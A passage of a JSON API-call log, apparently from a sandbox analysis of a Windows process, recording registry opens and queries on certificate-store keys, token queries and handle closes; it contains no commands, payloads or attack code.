"value": "0x0000052c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1377 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1378 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1379 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000052c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1380 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1381 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1382 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000052c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1383 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1384 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1385 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1386 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1387 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1388 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e870b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1389 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e8728", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1390 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1391 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1392 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e870b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1393 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e8728", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1394 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1395 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1396 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1397 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1398 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1399 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "p\\xf1[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x83!\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v2\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\x8c\\xf1[\\x05\\x98\\xf2[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\x08\\xf2[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f'sX\\xf2[\\x05\\xbb!\\xd6\\xfa<\\xed[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xffT\\xf2[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\x94\\xf2[\\x05\\xfc\\xf4\\xb4\\xf2T\\xf2D\\xf2\\xb8\\xf2\\x00\\x00<\\xff\\x00\\x00\\xfc\\xf4[\\x05\\xb4\\xf2[\\x05\\xb8\\xf2[\\x05\\x00\\x00\\x00\\x00h\\xf2[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\x94\\xf2[\\x05" + } + ], + "repeated": 0, + "id": 1400 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1401 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1402 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1403 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Root\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Root\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1404 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1405 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1406 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1407 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1408 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1409 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1410 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "p\\xf1[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x83!\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v2\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\x8c\\xf1[\\x05\\x98\\xf2[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\x08\\xf2[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f'sX\\xf2[\\x05\\xbb!\\xd6\\xfa<\\xed[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xffT\\xf2[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\x94\\xf2[\\x05\\xf8\\xf4\\xb4\\xf2T\\xf2D\\xf2\\xb8\\xf2\\x00\\x00<\\xff\\x00\\x00\\xf8\\xf4[\\x05\\xb4\\xf2[\\x05\\xb8\\xf2[\\x05\\x00\\x00\\x00\\x00h\\xf2[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\x94\\xf2[\\x05" + } + ], + "repeated": 0, + "id": 1411 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1412 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1413 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1414 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Root" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Root" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1415 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86ce", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1416 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1417 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1418 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + } + ], + "repeated": 0, + "id": 1419 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1420 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1421 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e870b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1422 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e8728", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1423 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1424 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\xe8\\xf0[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00{!\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v2\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\x04\\xf1[\\x05\\x10\\xf2[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\x80\\xf1[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's\\xd0\\xf1[\\x053!\\xd6\\xfa\\xb4\\xec[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\xcc\\xf1[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\x0c\\xf2[\\x05X\\xf4,\\xf2\\xcc\\xf1\\xbc\\xf10\\xf2\\x00\\x00<\\xff\\x00\\x00X\\xf4[\\x05,\\xf2[\\x050\\xf2[\\x05\\x00\\x00\\x00\\x00\\xe0\\xf1[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\x0c\\xf2[\\x05" + } + ], + "repeated": 0, + "id": 1425 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1426 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1427 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1428 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000530" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Root" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Root" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1429 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000534" + } + ], + "repeated": 0, + "id": 1430 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": 